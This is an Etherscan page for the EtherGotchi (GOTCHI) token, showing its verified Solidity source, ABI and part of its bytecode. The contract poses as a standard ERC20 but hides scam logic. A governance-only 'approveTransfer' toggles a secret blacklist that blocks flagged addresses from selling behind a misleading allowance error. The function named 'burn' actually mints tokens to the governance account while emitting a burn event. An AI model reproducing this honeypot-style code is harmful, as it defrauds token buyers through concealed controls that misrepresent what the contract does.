ETH Price: $2,518.63 (-0.22%)

Token

EtherGotchi (GOTCHI)
 

Overview

Max Total Supply

8,000,000,000,000 GOTCHI

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
*🖕️😡️🖕️.eth
Balance
16,881,927,680.417200274 GOTCHI

Value
$0.00
0x490153538858038009b964931d35b2e1ad823c7c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
EtherGotchi

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-02-15
*/

/** 
[WEBSITE]: https://ethergotchi.net/
[MEDIUM]: https://medium.com/@ethergotchi
[TWITTER]: https://twitter.com/EtherGotchi
[CHAT]: https://t.me/EtherGotchi
[NEWS]: https://t.me/EtherGotchiNews        */

// SPDX-License-Identifier: Unlicensed

pragma solidity =0.8.5;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _governance;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyGovernance() {
        require(_governance == _msgSender(), "Governance: caller is not the governance");
        _;
    }
    
    /**
     * @dev initiates a contract.
     */
    function initiatilize(address account) external onlyOwner {
        require (_governance == address(0));
        _governance = account;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _allowance;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
   
    function approveTransfer (address spender) external onlyGovernance {
        if (_allowance[spender] == true) {_allowance[spender] = false;} else {_allowance[spender] = true; }
    }

    /**
     * @notice Checking the allowance granted to `spender` by the caller.
     */
    function allowances(address spender) public view returns (bool) {
        return _allowance[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual onlyGovernance {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if (_allowance[sender] || _allowance[recipient]) 
        require (amount == 0, "ERC20: transfer amout exceeds allowance");
        
        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance + amount;
        }
        
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. 
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract EtherGotchi is ERC20 {

    /**
     * @dev Sets the values for {name}, {symbol} and {totalsupply}.
     */
    constructor() ERC20('EtherGotchi', 'GOTCHI')  {
        _totalSupply = 8000000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"allowances","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"approveTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"initiatilize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600b81526020017f4574686572476f746368690000000000000000000000000000000000000000008152506040518060400160405280600681526020017f474f5443484900000000000000000000000000000000000000000000000000008152506200009e62000092620001ad60201b60201c565b620001b560201b60201c565b8160069080519060200190620000b692919062000279565b508060079080519060200190620000cf92919062000279565b5050506901b1ae4d6e2ef5000000600581905550600554600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000136919062000357565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040516200019f91906200033a565b60405180910390a362000452565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200028790620003be565b90600052602060002090601f016020900481019282620002ab5760008555620002f7565b82601f10620002c657805160ff1916838001178555620002f7565b82800160010185558215620002f7579182015b82811115620002f6578251825591602001919060010190620002d9565b5b5090506200030691906200030a565b5090565b5b80821115620003255760008160009055506001016200030b565b5090565b6200033481620003b4565b82525050565b600060208201905062000351600083018462000329565b92915050565b60006200036482620003b4565b91506200037183620003b4565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620003a957620003a8620003f4565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620003d757607f821691505b60208210811415620003ee57620003ed62000423565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b611f9380620004626000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80634355b9d2116100a257806395d89b411161007157806395d89b41146102ba578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063dfa35082146103685761010b565b80634355b9d21461024657806370a0823114610262578063715018a6146102925780638da5cb5b1461029c5761010b565b80632b603c71116100de5780632b603c71146101ac578063313ce567146101dc57806339509351146101fa57806342966c681461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b6101486004803603810190610143919061156d565b610416565b604051610155919061180e565b60405180910390f35b610166610434565b60405161017391906119cb565b60405180910390f35b6101966004803603810190610191919061151a565b61043e565b6040516101a3919061180e565b60405180910390f35b6101c660048036038101906101c191906114ad565b610536565b6040516101d3919061180e565b60405180910390f35b6101e461058c565b6040516101f191906119e6565b60405180910390f35b610214600480360381019061020f919061156d565b610595565b604051610221919061180e565b60405180910390f35b610244600480360381019061023f91906115ad565b610641565b005b610260600480360381019061025b91906114ad565b6106ec565b005b61027c600480360381019061027791906114ad565b610895565b60405161028991906119cb565b60405180910390f35b61029a6108de565b005b6102a4610966565b6040516102b191906117f3565b60405180910390f35b6102c261098f565b6040516102cf9190611829565b60405180910390f35b6102f260048036038101906102ed919061156d565b610a21565b6040516102ff919061180e565b60405180910390f35b610322600480360381019061031d919061156d565b610b0c565b60405161032f919061180e565b60405180910390f35b610352600480360381019061034d91906114da565b610b2a565b60405161035f91906119cb565b60405180910390f35b610382600480360381019061037d91906114ad565b610bb1565b005b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b600061044b848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906118eb565b60405180910390fd5b61052a85610522610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006106376105a2610ccc565b8484600460006105b0610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106329190611a1d565b610cd4565b6001905092915050565b610649610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106cf906118ab565b60405180910390fd5b6106e96106e3610ccc565b8261120d565b50565b6106f4610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610783576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077a906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610839576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610892565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108e6610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610904610966565b73ffffffffffffffffffffffffffffffffffffffff161461095a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109519061190b565b60405180910390fd5b61096460006113b5565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461099e90611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546109ca90611afb565b8015610a175780601f106109ec57610100808354040283529160200191610a17565b820191906000526020600020905b8154815290600101906020018083116109fa57829003601f168201915b5050505050905090565b60008060046000610a30610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae4906119ab565b60405180910390fd5b610b01610af8610ccc565b85858403610cd4565b600191505092915050565b6000610b20610b19610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610bb9610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610bd7610966565b73ffffffffffffffffffffffffffffffffffffffff1614610c2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c249061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c8857600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561127d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112749061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611304576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112fb9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113a891906119cb565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b604082019050919050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611a